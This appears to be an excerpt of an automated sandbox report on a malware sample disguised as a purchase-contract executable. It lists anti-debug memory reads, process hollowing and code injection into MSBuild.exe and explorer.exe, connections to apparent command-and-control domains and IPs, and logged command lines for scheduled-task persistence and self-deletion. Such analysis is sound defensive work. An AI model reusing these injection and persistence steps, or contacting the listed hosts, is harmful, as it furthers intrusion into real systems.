Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B2AC7B mov eax, dword ptr fs:[00000030h]		9_2_04B2AC7B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B2AC7B mov eax, dword ptr fs:[00000030h]		9_2_04B2AC7B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B2AC7B mov eax, dword ptr fs:[00000030h]		9_2_04B2AC7B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B2AC7B mov eax, dword ptr fs:[00000030h]		9_2_04B2AC7B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B2AC7B mov eax, dword ptr fs:[00000030h]		9_2_04B2AC7B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B2AC7B mov eax, dword ptr fs:[00000030h]		9_2_04B2AC7B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B1746D mov eax, dword ptr fs:[00000030h]		9_2_04B1746D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B8C450 mov eax, dword ptr fs:[00000030h]		9_2_04B8C450
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B8C450 mov eax, dword ptr fs:[00000030h]		9_2_04B8C450
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B2A44B mov eax, dword ptr fs:[00000030h]		9_2_04B2A44B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B21DB5 mov eax, dword ptr fs:[00000030h]		9_2_04B21DB5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B21DB5 mov eax, dword ptr fs:[00000030h]		9_2_04B21DB5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B21DB5 mov eax, dword ptr fs:[00000030h]		9_2_04B21DB5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BC05AC mov eax, dword ptr fs:[00000030h]		9_2_04BC05AC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BC05AC mov eax, dword ptr fs:[00000030h]		9_2_04BC05AC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B235A1 mov eax, dword ptr fs:[00000030h]		9_2_04B235A1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04AF2D8A mov eax, dword ptr fs:[00000030h]		9_2_04AF2D8A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04AF2D8A mov eax, dword ptr fs:[00000030h]		9_2_04AF2D8A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04AF2D8A mov eax, dword ptr fs:[00000030h]		9_2_04AF2D8A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04AF2D8A mov eax, dword ptr fs:[00000030h]		9_2_04AF2D8A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04AF2D8A mov eax, dword ptr fs:[00000030h]		9_2_04AF2D8A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B2FD9B mov eax, dword ptr fs:[00000030h]		9_2_04B2FD9B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B2FD9B mov eax, dword ptr fs:[00000030h]		9_2_04B2FD9B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B22581 mov eax, dword ptr fs:[00000030h]		9_2_04B22581
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B22581 mov eax, dword ptr fs:[00000030h]		9_2_04B22581
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B22581 mov eax, dword ptr fs:[00000030h]		9_2_04B22581
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B22581 mov eax, dword ptr fs:[00000030h]		9_2_04B22581
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB2D82 mov eax, dword ptr fs:[00000030h]		9_2_04BB2D82
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB2D82 mov eax, dword ptr fs:[00000030h]		9_2_04BB2D82
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB2D82 mov eax, dword ptr fs:[00000030h]		9_2_04BB2D82
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB2D82 mov eax, dword ptr fs:[00000030h]		9_2_04BB2D82
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB2D82 mov eax, dword ptr fs:[00000030h]		9_2_04BB2D82
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB2D82 mov eax, dword ptr fs:[00000030h]		9_2_04BB2D82
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB2D82 mov eax, dword ptr fs:[00000030h]		9_2_04BB2D82
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BA8DF1 mov eax, dword ptr fs:[00000030h]		9_2_04BA8DF1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B0D5E0 mov eax, dword ptr fs:[00000030h]		9_2_04B0D5E0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B0D5E0 mov eax, dword ptr fs:[00000030h]		9_2_04B0D5E0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BBFDE2 mov eax, dword ptr fs:[00000030h]		9_2_04BBFDE2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BBFDE2 mov eax, dword ptr fs:[00000030h]		9_2_04BBFDE2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BBFDE2 mov eax, dword ptr fs:[00000030h]		9_2_04BBFDE2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BBFDE2 mov eax, dword ptr fs:[00000030h]		9_2_04BBFDE2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B76DC9 mov eax, dword ptr fs:[00000030h]		9_2_04B76DC9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B76DC9 mov eax, dword ptr fs:[00000030h]		9_2_04B76DC9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B76DC9 mov eax, dword ptr fs:[00000030h]		9_2_04B76DC9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B76DC9 mov ecx, dword ptr fs:[00000030h]		9_2_04B76DC9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B76DC9 mov eax, dword ptr fs:[00000030h]		9_2_04B76DC9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B76DC9 mov eax, dword ptr fs:[00000030h]		9_2_04B76DC9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B7A537 mov eax, dword ptr fs:[00000030h]		9_2_04B7A537
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BBE539 mov eax, dword ptr fs:[00000030h]		9_2_04BBE539
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B03D34 mov eax, dword ptr fs:[00000030h]		9_2_04B03D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B03D34 mov eax, dword ptr fs:[00000030h]		9_2_04B03D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B03D34 mov eax, dword ptr fs:[00000030h]		9_2_04B03D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B03D34 mov eax, dword ptr fs:[00000030h]		9_2_04B03D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B03D34 mov eax, dword ptr fs:[00000030h]		9_2_04B03D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B03D34 mov eax, dword ptr fs:[00000030h]		9_2_04B03D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B03D34 mov eax, dword ptr fs:[00000030h]		9_2_04B03D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B03D34 mov eax, dword ptr fs:[00000030h]		9_2_04B03D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B03D34 mov eax, dword ptr fs:[00000030h]		9_2_04B03D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B03D34 mov eax, dword ptr fs:[00000030h]		9_2_04B03D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B03D34 mov eax, dword ptr fs:[00000030h]		9_2_04B03D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B03D34 mov eax, dword ptr fs:[00000030h]		9_2_04B03D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B03D34 mov eax, dword ptr fs:[00000030h]		9_2_04B03D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BC8D34 mov eax, dword ptr fs:[00000030h]		9_2_04BC8D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B24D3B mov eax, dword ptr fs:[00000030h]		9_2_04B24D3B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B24D3B mov eax, dword ptr fs:[00000030h]		9_2_04B24D3B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B24D3B mov eax, dword ptr fs:[00000030h]		9_2_04B24D3B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04AFAD30 mov eax, dword ptr fs:[00000030h]		9_2_04AFAD30
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B1C577 mov eax, dword ptr fs:[00000030h]		9_2_04B1C577
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B1C577 mov eax, dword ptr fs:[00000030h]		9_2_04B1C577
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B17D50 mov eax, dword ptr fs:[00000030h]		9_2_04B17D50
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B33D43 mov eax, dword ptr fs:[00000030h]		9_2_04B33D43
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B73540 mov eax, dword ptr fs:[00000030h]		9_2_04B73540
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BA3D40 mov eax, dword ptr fs:[00000030h]		9_2_04BA3D40
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B746A7 mov eax, dword ptr fs:[00000030h]		9_2_04B746A7
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BC0EA5 mov eax, dword ptr fs:[00000030h]		9_2_04BC0EA5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BC0EA5 mov eax, dword ptr fs:[00000030h]		9_2_04BC0EA5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BC0EA5 mov eax, dword ptr fs:[00000030h]		9_2_04BC0EA5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B8FE87 mov eax, dword ptr fs:[00000030h]		9_2_04B8FE87
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B216E0 mov ecx, dword ptr fs:[00000030h]		9_2_04B216E0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B076E2 mov eax, dword ptr fs:[00000030h]		9_2_04B076E2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BC8ED6 mov eax, dword ptr fs:[00000030h]		9_2_04BC8ED6
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B38EC7 mov eax, dword ptr fs:[00000030h]		9_2_04B38EC7
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BAFEC0 mov eax, dword ptr fs:[00000030h]		9_2_04BAFEC0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B236CC mov eax, dword ptr fs:[00000030h]		9_2_04B236CC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BAFE3F mov eax, dword ptr fs:[00000030h]		9_2_04BAFE3F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04AFE620 mov eax, dword ptr fs:[00000030h]		9_2_04AFE620
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B2A61C mov eax, dword ptr fs:[00000030h]		9_2_04B2A61C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B2A61C mov eax, dword ptr fs:[00000030h]		9_2_04B2A61C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04AFC600 mov eax, dword ptr fs:[00000030h]		9_2_04AFC600
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04AFC600 mov eax, dword ptr fs:[00000030h]		9_2_04AFC600
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04AFC600 mov eax, dword ptr fs:[00000030h]		9_2_04AFC600
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B28E00 mov eax, dword ptr fs:[00000030h]		9_2_04B28E00
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB1608 mov eax, dword ptr fs:[00000030h]		9_2_04BB1608
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B1AE73 mov eax, dword ptr fs:[00000030h]		9_2_04B1AE73
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B1AE73 mov eax, dword ptr fs:[00000030h]		9_2_04B1AE73
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B1AE73 mov eax, dword ptr fs:[00000030h]		9_2_04B1AE73
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B1AE73 mov eax, dword ptr fs:[00000030h]		9_2_04B1AE73
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B1AE73 mov eax, dword ptr fs:[00000030h]		9_2_04B1AE73
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B0766D mov eax, dword ptr fs:[00000030h]		9_2_04B0766D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B07E41 mov eax, dword ptr fs:[00000030h]		9_2_04B07E41
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B07E41 mov eax, dword ptr fs:[00000030h]		9_2_04B07E41
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B07E41 mov eax, dword ptr fs:[00000030h]		9_2_04B07E41
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B07E41 mov eax, dword ptr fs:[00000030h]		9_2_04B07E41
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B07E41 mov eax, dword ptr fs:[00000030h]		9_2_04B07E41
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B07E41 mov eax, dword ptr fs:[00000030h]		9_2_04B07E41
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BBAE44 mov eax, dword ptr fs:[00000030h]		9_2_04BBAE44
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BBAE44 mov eax, dword ptr fs:[00000030h]		9_2_04BBAE44
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B77794 mov eax, dword ptr fs:[00000030h]		9_2_04B77794
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B77794 mov eax, dword ptr fs:[00000030h]		9_2_04B77794
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B77794 mov eax, dword ptr fs:[00000030h]		9_2_04B77794
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B08794 mov eax, dword ptr fs:[00000030h]		9_2_04B08794
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B337F5 mov eax, dword ptr fs:[00000030h]		9_2_04B337F5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04AF4F2E mov eax, dword ptr fs:[00000030h]		9_2_04AF4F2E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04AF4F2E mov eax, dword ptr fs:[00000030h]		9_2_04AF4F2E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B2E730 mov eax, dword ptr fs:[00000030h]		9_2_04B2E730
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B1B73D mov eax, dword ptr fs:[00000030h]		9_2_04B1B73D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B1B73D mov eax, dword ptr fs:[00000030h]		9_2_04B1B73D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B1F716 mov eax, dword ptr fs:[00000030h]		9_2_04B1F716
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B8FF10 mov eax, dword ptr fs:[00000030h]		9_2_04B8FF10
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B8FF10 mov eax, dword ptr fs:[00000030h]		9_2_04B8FF10
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BC070D mov eax, dword ptr fs:[00000030h]		9_2_04BC070D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BC070D mov eax, dword ptr fs:[00000030h]		9_2_04BC070D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B2A70E mov eax, dword ptr fs:[00000030h]		9_2_04B2A70E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B2A70E mov eax, dword ptr fs:[00000030h]		9_2_04B2A70E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B0FF60 mov eax, dword ptr fs:[00000030h]		9_2_04B0FF60
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BC8F6A mov eax, dword ptr fs:[00000030h]		9_2_04BC8F6A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B0EF40 mov eax, dword ptr fs:[00000030h]		9_2_04B0EF40
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B2F0BF mov ecx, dword ptr fs:[00000030h]		9_2_04B2F0BF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B2F0BF mov eax, dword ptr fs:[00000030h]		9_2_04B2F0BF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B2F0BF mov eax, dword ptr fs:[00000030h]		9_2_04B2F0BF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B220A0 mov eax, dword ptr fs:[00000030h]		9_2_04B220A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B220A0 mov eax, dword ptr fs:[00000030h]		9_2_04B220A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B220A0 mov eax, dword ptr fs:[00000030h]		9_2_04B220A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B220A0 mov eax, dword ptr fs:[00000030h]		9_2_04B220A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B220A0 mov eax, dword ptr fs:[00000030h]		9_2_04B220A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B220A0 mov eax, dword ptr fs:[00000030h]		9_2_04B220A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B390AF mov eax, dword ptr fs:[00000030h]		9_2_04B390AF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04AF9080 mov eax, dword ptr fs:[00000030h]		9_2_04AF9080
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B73884 mov eax, dword ptr fs:[00000030h]		9_2_04B73884
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B73884 mov eax, dword ptr fs:[00000030h]		9_2_04B73884
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04AF58EC mov eax, dword ptr fs:[00000030h]		9_2_04AF58EC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04AF40E1 mov eax, dword ptr fs:[00000030h]		9_2_04AF40E1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04AF40E1 mov eax, dword ptr fs:[00000030h]		9_2_04AF40E1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04AF40E1 mov eax, dword ptr fs:[00000030h]		9_2_04AF40E1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B1B8E4 mov eax, dword ptr fs:[00000030h]		9_2_04B1B8E4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B1B8E4 mov eax, dword ptr fs:[00000030h]		9_2_04B1B8E4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B8B8D0 mov eax, dword ptr fs:[00000030h]		9_2_04B8B8D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B8B8D0 mov ecx, dword ptr fs:[00000030h]		9_2_04B8B8D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B8B8D0 mov eax, dword ptr fs:[00000030h]		9_2_04B8B8D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B8B8D0 mov eax, dword ptr fs:[00000030h]		9_2_04B8B8D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B8B8D0 mov eax, dword ptr fs:[00000030h]		9_2_04B8B8D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B8B8D0 mov eax, dword ptr fs:[00000030h]		9_2_04B8B8D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B1A830 mov eax, dword ptr fs:[00000030h]		9_2_04B1A830
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B1A830 mov eax, dword ptr fs:[00000030h]		9_2_04B1A830
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B1A830 mov eax, dword ptr fs:[00000030h]		9_2_04B1A830
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B1A830 mov eax, dword ptr fs:[00000030h]		9_2_04B1A830
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B0B02A mov eax, dword ptr fs:[00000030h]		9_2_04B0B02A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B0B02A mov eax, dword ptr fs:[00000030h]		9_2_04B0B02A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B0B02A mov eax, dword ptr fs:[00000030h]		9_2_04B0B02A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B0B02A mov eax, dword ptr fs:[00000030h]		9_2_04B0B02A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B2002D mov eax, dword ptr fs:[00000030h]		9_2_04B2002D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B2002D mov eax, dword ptr fs:[00000030h]		9_2_04B2002D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B2002D mov eax, dword ptr fs:[00000030h]		9_2_04B2002D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B2002D mov eax, dword ptr fs:[00000030h]		9_2_04B2002D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B2002D mov eax, dword ptr fs:[00000030h]		9_2_04B2002D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B77016 mov eax, dword ptr fs:[00000030h]		9_2_04B77016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B77016 mov eax, dword ptr fs:[00000030h]		9_2_04B77016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04B77016 mov eax, dword ptr fs:[00000030h]		9_2_04B77016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BC4015 mov eax, dword ptr fs:[00000030h]		9_2_04BC4015
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BC4015 mov eax, dword ptr fs:[00000030h]		9_2_04BC4015
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04BB2073 mov eax, dword ptr fs:[00000030h]		9_2_04BB2073

Enables debug privileges

Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process token adjusted: Debug			Jump to behavior

Creates guard pages, often used to prevent reverse engineering and debugging

Source: C:\Users\user\Desktop\Purchase contract #9009.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.mtsnurulislamsby.com
Source: C:\Windows\explorer.exe	Network Connect: 209.99.40.222 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 160.153.136.3 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 217.160.0.129 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.71.233.107 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.lifestylebykendra.com
Source: C:\Windows\explorer.exe	Domain query: www.cypios.net
Source: C:\Windows\explorer.exe	Domain query: www.ascope.club
Source: C:\Windows\explorer.exe	Network Connect: 95.215.210.10 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 199.34.228.189 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.wintonplaceoh.com
Source: C:\Windows\explorer.exe	Domain query: www.narrowpathwc.com
Source: C:\Windows\explorer.exe	Domain query: www.5fashionfix.net
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.braun-mathematik.online
Source: C:\Windows\explorer.exe	Domain query: www.teamtacozzzz.com

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Purchase contract #9009.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread register set: target process: 3424			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Thread register set: target process: 3424			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Section unmapped: C:\Windows\SysWOW64\explorer.exe base address: 180000

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: E9C008			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\nzRFOjxWpomfsw' /XML 'C:\Users\user\AppData\Local\Temp\tmpC4FD.tmp'			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'			Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Source: explorer.exe, 00000005.00000000.665240943.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000005.00000000.665573323.0000000001080000.00000002.00000001.sdmp, explorer.exe, 00000009.00000002.904896244.00000000031E0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: MSBuild.exe, 00000004.00000002.717925108.0000000003200000.00000040.00000001.sdmp, explorer.exe, 00000005.00000000.678646316.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000009.00000002.904896244.00000000031E0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.665573323.0000000001080000.00000002.00000001.sdmp, explorer.exe, 00000009.00000002.904896244.00000000031E0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: MSBuild.exe, 00000004.00000002.717925108.0000000003200000.00000040.00000001.sdmp	Binary or memory string: Microsoft-Reserved-24C26ACC-DE62-4303-88AD-6CD4F1447F18SecurityConfigureWindowsPasswordsProxy DesktopProgmanSoftware\Microsoft\Windows NT\CurrentVersion\WinlogonShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells\AvailableShells
